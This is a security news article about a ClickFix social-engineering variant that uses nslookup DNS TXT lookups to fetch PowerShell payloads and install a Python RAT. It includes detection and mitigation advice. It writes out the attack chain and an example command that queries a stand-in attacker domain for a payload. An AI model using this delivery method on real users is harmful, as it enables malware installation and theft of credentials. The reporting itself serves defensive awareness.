Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

429+ Articles
114+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. News
  3. ClickFix Attacks Evolve — Now Abusing DNS nslookup for
ClickFix Attacks Evolve — Now Abusing DNS nslookup for
NEWS

ClickFix Attacks Evolve — Now Abusing DNS nslookup for

Microsoft discloses a new ClickFix variant that uses DNS nslookup commands to retrieve and execute malicious PowerShell payloads, marking the first known...

Dylan H.

News Desk

February 15, 2026
4 min read

ClickFix Goes DNS-Native

Microsoft has disclosed a dangerous evolution of the ClickFix social engineering technique — attackers are now using DNS nslookup commands to retrieve and execute malicious PowerShell payloads. This is the first known use of DNS as a delivery channel in ClickFix campaigns, allowing malicious activity to blend into normal DNS traffic and evade web-based detection.


What Is ClickFix?

ClickFix is a social engineering technique that tricks users into manually executing malicious commands by presenting fake error dialogs or CAPTCHA pages. The technique exploits user trust and bypasses security controls because the victim voluntarily runs the command.

Previous ClickFix Variants

VariantDeliveryDetection
Classic ClickFixPowerShell via Run dialogWeb proxy, PowerShell logging
Clipboard ClickFixPaste commands from clipboardEndpoint monitoring
DNS ClickFix (NEW)nslookup via Run dialogBlends into DNS traffic

How the DNS-Based Attack Works

1. Victim encounters fake error page or CAPTCHA
2. Page instructs user to press Win+R and paste a command
3. Command runs: nslookup -type=TXT payload.attacker-domain.com
4. DNS TXT record returns encoded PowerShell script
5. PowerShell downloads ZIP from attacker-controlled server
6. ZIP extracts Python-based reconnaissance script
7. Reconnaissance collects system info, installed software, network config
8. "ModeloRAT" — Python-based RAT — deployed
9. Persistence via Windows Startup folder .lnk file

Why DNS Delivery Is Dangerous

The nslookup command is a legitimate Windows utility used by IT professionals daily. Using it for payload retrieval:

  • Bypasses web proxies — DNS queries don't traverse HTTP proxies
  • Evades URL filtering — No URLs to block or scan
  • Blends into normal traffic — DNS queries are ubiquitous
  • No file download — Initial payload is in a DNS TXT record
  • Legitimate binary — nslookup.exe is signed by Microsoft

ModeloRAT: The Final Payload

The campaign deploys ModeloRAT, a Python-based remote access trojan with the following capabilities:

CapabilityDescription
Remote Command ExecutionExecute arbitrary commands on victim system
File OperationsUpload, download, delete, and enumerate files
Screenshot CapturePeriodic screenshot collection
KeyloggingKeystroke recording
Credential HarvestingBrowser password and cookie extraction
System ReconnaissanceHardware, software, and network enumeration

Persistence

ModeloRAT achieves persistence by placing a .lnk shortcut file in the Windows Startup folder that launches the Python interpreter with the RAT script on every login.


Detection Opportunities

DNS Monitoring

# Look for unusual TXT record queries
nslookup -type=TXT [suspicious domain]

# Monitor for nslookup spawned from explorer.exe (Run dialog)
# Parent process: explorer.exe → Child: nslookup.exe

Endpoint Detection

  • nslookup.exe spawned by explorer.exe (Win+R dialog) is unusual
  • PowerShell spawned shortly after nslookup with encoded commands
  • Python processes running from temporary directories
  • New .lnk files in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\

Network Indicators

  • DNS TXT queries to recently registered domains
  • Large DNS TXT responses (>500 bytes) containing encoded data
  • Connections to attacker C2 infrastructure following DNS queries

Mitigation

  1. User awareness training — Educate users that legitimate websites never ask them to run commands in the Run dialog
  2. Restrict nslookup — Consider AppLocker/WDAC policies to limit nslookup execution to IT staff
  3. DNS monitoring — Deploy DNS logging and monitor for anomalous TXT record queries
  4. PowerShell constraints — Enable Constrained Language Mode and script block logging
  5. Startup folder monitoring — Alert on new .lnk files in user Startup folders

Sources

  • The Hacker News — Microsoft Discloses DNS-Based ClickFix Attack
  • BleepingComputer — New ClickFix Attack Abuses nslookup
  • SecurityWeek — Microsoft Warns of ClickFix Attack Abusing DNS Lookups
  • Malwarebytes — ClickFix Added nslookup Commands to Its Arsenal
#ClickFix#DNS#Social Engineering#PowerShell#RAT#ModeloRAT

Related Articles

Claude AI Artifacts Abused to Distribute macOS Infostealer

Threat actors are abusing publicly shared Claude AI artifacts and Google Ads to deliver the MacSync infostealer to macOS users through ClickFix social...

3 min read

ClickFix Campaign Targets European Hotels with Fake

A sophisticated phishing campaign dubbed PHALT#BLYX is targeting European hospitality organizations with fake Booking.com cancellation emails that display...

3 min read

North Korea Deploys AI-Generated Video and ClickFix

North Korean threat actors are running sophisticated campaigns using AI-generated deepfake videos and the ClickFix social engineering technique to target...

6 min read
Back to all News